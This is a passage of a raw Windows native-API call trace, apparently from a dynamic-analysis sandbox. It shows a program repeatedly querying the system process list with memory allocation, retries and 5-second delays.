returned 0x0 [0239.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.448] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.450] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.450] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.455] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.469] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.477] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.484] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.503] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.507] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.512] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.515] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.520] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.529] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.537] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.544] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.551] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.557] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.558] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.561] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.566] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.575] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.582] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.589] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.596] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.604] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.611] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.618] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.626] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, 